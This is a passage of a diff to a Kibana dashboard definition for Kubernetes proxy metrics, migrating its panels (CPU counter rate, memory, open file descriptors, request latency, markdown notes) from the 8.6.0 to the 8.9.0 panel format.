+ "format": { + "id": "bytes", + "params": { + "decimals": 2 
+ } + }, + "formula": "last_value(kubernetes.proxy.process.memory.virtual.bytes, kql='kubernetes.proxy.process.memory.virtual.bytes: *')", + "isFormulaBroken": false + }, + "references": [ + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "scale": "ratio" + }, + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Part of Virtual memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "169f9d33-cf55-422e-906e-f4eecb26a362", + "key": "kubernetes.proxy.process.fds.open.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.proxy.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#D6BF57", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ 
- "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.cpu.sec: *" - }, - "isBucketed": false, - "label": "Part of Differences in Controller Proxy", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Differences in Controller Proxy", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - 
}, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#D6BF57", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Proxy process data " + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 24 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - 
"visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 33 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": 
"average(kubernetes.proxy.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.proxy.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + 
"cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.proxy.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 45 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": 
{ - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory " + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests counter rate , Client error responses counter rate** and **Server error responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. 
After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } + }, + "formula": "counter_rate(last_value(kubernetes.proxy.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Differences in Controller Proxy", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Differences in Controller Proxy", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + 
"axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 4, - "i": "6a11dafa-5cd1-49e7-9806-15110738093d", - "w": 48, - "x": 0, - "y": 48 + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "6a11dafa-5cd1-49e7-9806-15110738093d", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - 
"43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency s", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.duration.us.count" - }, - 
"43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 126, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 45 + }, + "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": 
"metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "6a11dafa-5cd1-49e7-9806-15110738093d", + "w": 48, + "x": 0, + "y": 48 + }, + "panelIndex": "6a11dafa-5cd1-49e7-9806-15110738093d", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The 
default period to fetch the metrics used in **Requests counter rate , Client error responses counter rate** and **Server error responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 52 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": 
false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "legendSize": "xlarge", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "secondaryFields": [ + "kubernetes.proxy.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.proxy.host" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency s", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": 
"kubernetes.proxy.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 126, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 52 + "layers": [ + { + 
"accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "xlarge", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { 